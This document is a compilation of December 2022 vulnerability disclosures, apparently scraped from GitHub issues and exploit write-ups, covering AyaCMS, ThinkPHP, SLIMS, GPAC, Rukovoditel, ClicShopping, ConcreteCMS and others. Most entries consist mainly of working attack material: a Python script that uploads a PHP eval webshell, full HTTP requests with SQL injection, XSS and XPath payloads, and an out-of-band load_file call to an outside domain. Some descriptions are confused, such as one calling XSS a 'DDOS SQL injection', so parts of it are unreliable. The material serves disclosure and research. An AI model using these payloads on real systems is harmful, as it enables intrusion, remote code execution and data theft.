AyaCMS v3.1.2 has an Arbitrary File Upload vulnerability.

Register a frontend user and login to get the cookie, then upload our webshell.

    import requests
    
    files = {
        'Filedata': ('shell.php', '<?php @eval($_POST[2333]);')
    }
    cookies = {
        'aya_auth': 'UmMGDhI2GypYeUw1XApRO1dkEiEFN1UwTCcGOhZxVjxbOwRhCWwTf0ErTSNJLl9mRCMQcAMzXjlBLgY7DGtFKFJnBjcSJBt2WGlMc1w3',
        'aya_template': 'pc'
    }
    url = 'http://localhost/AyaCMS/ajax.php?fun=upload_file'
    r = requests.post(url=url, files=files, cookies=cookies)
    print(r.text)
    

We will get a webshell.

CVE-2022-45548: AyaCMS v3.1.2 has a Frontend Arbitrary File Upload Vulnerability  · Issue #4 · loadream/AyaCMS

Thinkphp 5.1.41 and 5.0.24 has a code logic error which causes file upload getshell.

**Thinkphp has a code logic error**

Moderate severity GitHub Reviewed Published Dec 6, 2022 • Updated Dec 6, 2022

GHSA-59fh-rjq3-xq7j: Thinkphp has a code logic error

**Code logic error causes file upload getshell**  
Verify version:Thinkphp5.1.41/Thinkphp5.0.24  
Install:composer create-project topthink/think tp 5.xxx

test version:Thinkphp5.1.41  
If the user directly uses the move method of thinkphp  
like this：Add an upload controller like the official documentation:https://www.kancloud.cn/manual/thinkphp5\_1/354121

<?php
namespace app\\index\\controller;

class Upload 
{
    public function index(){
        // 获取表单上传文件 例如上传了001.jpg
        $file = request()->file('image');
        // 移动到框架网站目录/uploads/ 目录下
        $info = $file\->move( './uploads');
        if($info){
            // 成功上传后 获取上传信息
            // 输出 jpg
            echo $info\->getExtension();
            // 输出 20160820/42a79759f284b767dfcb2a0197904287.jpg
            echo $info\->getSaveName();
            // 输出 42a79759f284b767dfcb2a0197904287.jpg
            echo $info\->getFilename(); 
        }else{
            // 上传失败获取错误信息
            echo $file\->getError();
        }
    }

}

Will cause the file with the suffix php to be uploaded directly  
Because in thinkphp\library\think\File.php line 272 it is allowed

public function checkImg()
    {
        $extension = strtolower(pathinfo($this\->getInfo('name'), PATHINFO\_EXTENSION));

        /\* 对图像文件进行严格检测 \*/
        if (in\_array($extension, \['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'\]) && !in\_array($this\->getImageType($this\->filename), \[1, 2, 3, 4, 6, 13\])) {
            $this\->error = 'illegal image files';
            return false;
        }

        return true;
    }

I think the problem is that true and false are written in reverse. And !in\_array getImageType

The logic should be?

public function checkImg()
    {
        $extension = strtolower(pathinfo($this\->getInfo('name'), PATHINFO\_EXTENSION));

        /\* 对图像文件进行严格检测 \*/
        if (in\_array($extension, \['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'\]) && in\_array($this\->getImageType($this\->filename), \[1, 2, 3, 4, 6, 13\])) {
            return true;
        }

        return false;
    }

CVE-2022-44289: Code logic error causes file upload getshell · Issue #2772 · top-think/framework

Senayan Library Management System version 9.5.1 suffers from a remote SQL injection vulnerability.

## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.06.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.5.1/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'was submitted in the manual insertion `point 4` testing.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can execute a very dangerous `subquery` to view verysensitive information.## STATUS: HIGH Vulnerability[+] Payload:```MySQLGET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaaHTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;SenayanMember=schm4nbtgbb5i1tbeonr6cav3uConnection: close```[+] Response:```MySQLHTTP/1.1 200 OKDate: Tue, 06 Dec 2022 13:51:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockContent-Length: 4120Connection: closeContent-Type: text/html; charset=UTF-8<!doctype html><html><head><title>Loan Report by Class Report</title>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/jquery.js"></script>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/gui.js"></script></head><body><div id="pageContent">  <div class="mb-2">Loan Recap By Class<strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<strong>2002</strong> <a class="s-btn btn btn-default printReport"onclick="window.print()" href="#">Print Current Page</a><ahref="../xlsoutput.php" class="s-btn btn btn-default"target="_BLANK">Export to spreadsheet format</a>    <a class="s-btn btn btn-info notAJAX openPopUp"href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"width="700" height="530" title="Loan Recap By Class">Show inchart/plot</a></div><table class="s-table table table-sm table-bordered"><tr><thclass="dataListHeaderPrinted">Classification</th><thclass="dataListHeaderPrinted">Jan</th><thclass="dataListHeaderPrinted">Feb</th><thclass="dataListHeaderPrinted">Mar</th><thclass="dataListHeaderPrinted">Apr</th><thclass="dataListHeaderPrinted">May</th><thclass="dataListHeaderPrinted">Jun</th><thclass="dataListHeaderPrinted">Jul</th><thclass="dataListHeaderPrinted">Aug</th><thclass="dataListHeaderPrinted">Sep</th><thclass="dataListHeaderPrinted">Oct</th><thclass="dataListHeaderPrinted">Nov</th><thclass="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><div class="loader"></div><script type="text/javascript">    // if we are inside iframe    jQuery(document).ready(function () {          });</script></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)## Proof and Exploit:[href](https://streamable.com/gthu91)## Time spent`04:00:00`

Senayan Library Management System 9.5.1 SQL Injection

The web-management application on Seagate Central NAS STCG2000300, STCG3000300, and STCG4000300 devices allows OS command injection via mv_backend_launch in cirrus/application/helpers/mv_backend_helper.php by leveraging the "start" state and sending a check_device_name request.

CVE-2020-6627

GPAC MP4box v2.0.0 was discovered to contain a stack overflow in the smil_parse_time_list parameter at /scenegraph/svg_attributes.c.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

A fixed length buffer value\_string is allocated in smil\_parse\_time\_list, while in the later memcpy, it doesn't check the length and simply copy content to this buffer, causing overflow.

static void smil\_parse\_time\_list(GF\_Node \*e, GF\_List \*values, char \*begin\_or\_end\_list)
{
	SMIL\_Time \*value;
	char value\_string\[500\];
	char \*str = begin\_or\_end\_list, \*tmp;
	u32 len;

	/\* get rid of leading spaces \*/
	while (\*str == ' ') str++;

	while (1) {
		tmp = strchr(str, ';');
		if (tmp) len = (u32) (tmp-str);
		else len = (u32) strlen(str);
		memcpy(value\_string, str, len);
		while ((len > 0) && (value\_string\[len - 1\] == ' '))

**Impact**

Since the content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary, causing DoS or even Remote Code Execution.

**Mitigation**

We can just set a length limit to it, making it less than 500 byte.

**Reproduce**

On Ubuntu 22.04 lts, make with this.

    ./configure --static-bin
    make
    

Run the following command with POC.svg.

    MP4Box -mp4 -sync 0x1000 ./POC.svg
    

You may get a buffer overflow detected error.

    [Parser] SVG Scene Parsing: ../encode_2-gpac-2.0.0/out/default/crashes/0.svg
    *** buffer overflow detected ***: terminated               | (00/100)
    Aborted
    

GDB info before crash

    ─────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────
     RAX  0x6804
     RBX  0x0
     RCX  0x1f4
     RDX  0x6804
    *RDI  0x7fffffff6640 ◂— 0x0
     RSI  0xda20cc ◂— 0xff22802d68353548
     R8   0x0
     R9   0xda08b0 ◂— 0x0
     R10  0xda2050 ◂— 0x1790
     R11  0xd80c00 (main_arena+96) —▸ 0xdabcf0 ◂— 0x0
     R12  0xda08b0 ◂— 0x0
     R13  0x7fffffff6640 ◂— 0x0
     R14  0xda20cc ◂— 0xff22802d68353548
     R15  0xb650c3 ◂— 'wallclock('
     RBP  0x6804
     RSP  0x7fffffff6600 ◂— 0x0
    *RIP  0x4c756b (smil_parse_time_list+123) ◂— call   0xadfe30
    ──────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────
       0x4c77e2 <smil_parse_time_list+754>    jmp    smil_parse_time_list+110                      <smil_parse_time_list+110>
        ↓
       0x4c755e <smil_parse_time_list+110>    mov    edx, ebp
       0x4c7560 <smil_parse_time_list+112>    mov    ecx, 0x1f4
       0x4c7565 <smil_parse_time_list+117>    mov    rsi, r14
       0x4c7568 <smil_parse_time_list+120>    mov    rdi, r13
     ► 0x4c756b <smil_parse_time_list+123>    call   __memcpy_chk                      <__memcpy_chk>
            dstpp: 0x7fffffff6640 ◂— 0x0
            srcpp: 0xda20cc ◂— 0xff22802d68353548
            len: 0x6804
            dstlen: 0x1f4
    

Backtrace

    pwndbg> bt
    #0  0x0000000000a84c3c in pthread_kill ()
    #1  0x0000000000a640d6 in raise ()
    #2  0x0000000000402136 in abort ()
    #3  0x0000000000a7b476 in __libc_message ()
    #4  0x0000000000adfe2a in __fortify_fail ()
    #5  0x0000000000adfc46 in __chk_fail ()
    #6  0x00000000004c7570 in smil_parse_time_list ()
    #7  0x00000000004c965b in gf_svg_parse_attribute ()
    #8  0x000000000063d178 in svg_node_start ()
    #9  0x0000000000463486 in xml_sax_node_start ()
    #10 0x0000000000464629 in xml_sax_parse ()
    #11 0x0000000000464e63 in xml_sax_read_file.part ()
    #12 0x000000000046515e in gf_xml_sax_parse_file ()
    #13 0x000000000063b80a in load_svg_run ()
    #14 0x000000000042a5e8 in EncodeFile ()
    #15 0x000000000041252c in mp4boxMain ()
    #16 0x0000000000a598fa in __libc_start_call_main ()
    #17 0x0000000000a5b157 in __libc_start_main_impl ()
    #18 0x0000000000402b95 in _start ()
    

**Credit**

xdchase

**POC**

POC-bof.zip

CVE-2022-45283: GPAC-2.0.0 MP4Box: stack overflow with unlimited length and controllable content in smil_parse_time_list · Issue #2295 · gpac/gpac

Rukovoditel v3.2.1 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability in the component /rukovoditel/index.php?module=users/login. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**Vendor**

**Description:**

The application is vulnerable to DOM-based cross-site scripting attacks. Data is read from location.hash and passed to jQuery.parseHTML. The registration function is not sanitizing well the hash gy651j5d1skektlts3g10ddvz6scjtas6mwi09hz6 from <a style="float: right" class="btn btn-info btn-registration" href="http://pwnedhost.com/rukovoditel/index.php?module=users/registration">gy651j5d1skektlts3g10ddvz6scjtas6mwi09hz6</a> was submited in GET request. The attacker can use this vulnerability to create an unlimited number of accounts on this system until it crashed.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Request:

    GET /rukovoditel/index.php?module=users/login HTTP/1.1
    Host: pwnedhost.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cookie_test=please_accept_for_session; sid=2di7vn24tfnntmif91itsspf79
    Connection: close
    

\[+\] Response location.hash:

    <form action="http://pwnedhost.com/rukovoditel/index.php?module=users/login&action=login"  name="login_form" id="login_form" method="post" class="login-form"> <input  name="form_session_token" id="form_session_token" value="ChctFpqE22" type="hidden">
        <div class="form-group">
            
            <label class="control-label visible-ie8 visible-ie9">Username</label>
            <div class="input-icon">
                <i class="fa fa-user"></i>
                <input class="form-control placeholder-no-fix required" type="text" autocomplete="off" placeholder="Username" name="username"/>
            </div>
        </div>
        <div class="form-group">
            <label class="control-label visible-ie8 visible-ie9">Password</label>
            <div class="input-icon">
                <i class="fa fa-lock"></i>
                <input class="form-control placeholder-no-fix required"  type="password" autocomplete="off" placeholder="Password" name="password"/>
            </div>
        </div>
    
            
        <div class="form-actions">
                        <label class="checkbox"> <input  name="remember_me" id="remember_me" value="1" type="checkbox"> Remember Me</label>
            
            <button type="submit" class="btn btn-info pull-right">Login</button>
        </div>
    
        </form>
    
        <div class="forget-password">	
            <a style="float: right" class="btn btn-info btn-registration" href="http://pwnedhost.com/rukovoditel/index.php?module=users/registration">xovnabtd3t6fmsfirnuwpe0gn4ga7rxusvipagr6g</a>        <p><a href="http://pwnedhost.com/rukovoditel/index.php?module=users/restore_password">Password forgotten?</a></p>
        </div>
    

\[+\] Payload:

    GET /rukovoditel/index.php?module=dashboard/check_project_version&12958%22%3balert(Hello_from_nu11secur1ty)%2f%2f807=1 HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: sid=me62gha57kek97j4m651jtuan8; cookie_test=please_accept_for_session; app_login_redirect_to=module%3Ddashboard%2F; app_remember_me=1; app_stay_logged=1; app_remember_user=YWRtaW4%3D; app_remember_pass=JFAkRUo2eU9wSWYuU095MWIyV0hQQWg2SjdoSS90ejhLMQ%3D%3D
    X-Requested-With: XMLHttpRequest
    Referer: http://pwnedhost.com/rukovoditel/index.php?module=dashboard/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    
    

\[+\]Exploit:

    POST /rukovoditel/index.php?module=users/registration&action=save HTTP/1.1
    Host: pwnedhost.com
    Content-Length: 971
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://pwnedhost.com
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPtmHRBVsASEoZQx1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/registration
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cookie_test=please_accept_for_session; sid=rcktjdlje3102291rfbvs19otn
    Connection: close
    
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="form_session_token"
    
    FXvkuHKIrc
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[6]"
    
    4
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[12]"
    
    k1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="password"
    
    password
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[7]"
    
    k1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[8]"
    
    k1nov
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[9]"
    
    k1@k.com
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[13]"
    
    english.php
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="user_agreement"
    
    1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1--
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

3:45

CVE-2022-45020: CVE-nu11secur1ty/vendors/rukovoditel.net/2022/rukovoditel-3.2.1 at main · nu11secur1ty/CVE-nu11secur1ty

A cross-site scripting (XSS) vulnerability in the component /signup_script.php of Ecommerce-Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the eMail parameter.

**Description:**

The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Exploit00:

    POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    

**Description01:**

JavaScript can be injected into the application response (a vulnerable app - signup\_script.php, no sanitizing submit function). The attacker can crash the MySQL server by sending large bites of POST requests to the MySQL server of this system.

**Real attack: JavaScript attack - type: DDOS SQL injection**

\[+\] Exploit01:

    POST /ecommerce/signup_script.php HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 1070
    
    eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Real Exploit:**

href

**Real Exploit - code insert:**

href

**Time spent**

1:45

CVE-2022-45990: CVE-nu11secur1ty/vendors/winston-dsouza/ecommerce-website at main · nu11secur1ty/CVE-nu11secur1ty

A cross-site scripting (XSS) vulnerability in ClicShopping_V3 v3.402 allows attackers to execute arbitrary web scripts or HTML via a crafted URL parameter.

The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick users to open a very dangerous link or he can get sensitive information, also he can destroy some components of your system.

GET /ClicShopping\_V3\-version3\_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(\`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole\`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j\=1 HTTP/1.1
Host: pwnedhost.com
Accept\-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Language: en\-US;q\=0.9,en;q\=0.8
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Sec\-CH\-UA: ".Not/A)Brand";v\="99", "Google Chrome";v\="107", "Chromium";v\="107"
Sec\-CH\-UA\-Platform: Windows
Sec\-CH\-UA\-Mobile: ?0

CVE-2022-45769: CVE-nu11secur1ty/vendors/clicshopping.org/2022/ClicShopping_V3 at main · nu11secur1ty/CVE-nu11secur1ty

ConcreteCMS v9.1.3 was discovered to be vulnerable to Xpath injection attacks. This vulnerability allows attackers to access sensitive XML data via a crafted payload injected into the URL path folder "3".

**concretecms-9.1.3 - XPath injection - File Path traversal****Vendor**

**Description:**

The URL path folder 3 appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in the URL path folder 3, and an XPath error message was returned. The attacker can flood with requests the system by using this vulnerability to untilted he receives the actual paths of the all content of this system which content is stored on some internal or external server.

**STATUS: HIGH Vulnerability**

\[+\] Exploit:

    GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    

\[+\] Response:

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153

<!DOCTYPE html><html>
  <head>
    <meta charset="utf-8">
    <meta name="robots" content="noindex,nofollow"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>
    <title>Concrete CMS has encountered an issue.</title>

    <style>body {
  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
  color: #131313;
  background: #eeeeee;
  padding:0;
  margin: 0;
  max-height: 100%;

  text-rendering: optimizeLegibility;
}
  a {
    text-decoration: none;
  }

.Whoops.container {
    position: relative;
    z-index: 9999999999;
}

.panel {
    overflow-y: scroll;
    height: 100%;
    position: fixed;
    margin: 0;
    left: 0;
    top: 0;
}

.branding {
  position: absolute;
  top: 10px;
  right: 20px;
  color: #777777;
  font-size: 10px;
    z-index: 100;
}
  .branding a {
    color: #e95353;
  }

header {
  color: white;
  box-sizing: border-box;
  background-color: #2a2a2a;
  padding: 35px 40px;
  max-height: 180px;
  overflow: hidden;
  transition: 0.5s;
}

  header.header-expand {
    max-height: 1000px;
  }

  .exc-title {
    margin: 0;
    color: #bebebe;
    font-size: 14px;
  }
    .exc-title-primary, .exc-title-secondary {
      color: #e95353;
    }

    .exc-message {
      font-size: 20px;
      word-wrap: break-word;
      margin: 4px 0 0 0;
      color: white;
    }
      .exc-message span {
        display: block;
      }
      .exc-message-empty-notice {
        color: #a29d9d;
        font-weight: 300;
      }

.......

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

03:00:00

Tag

#php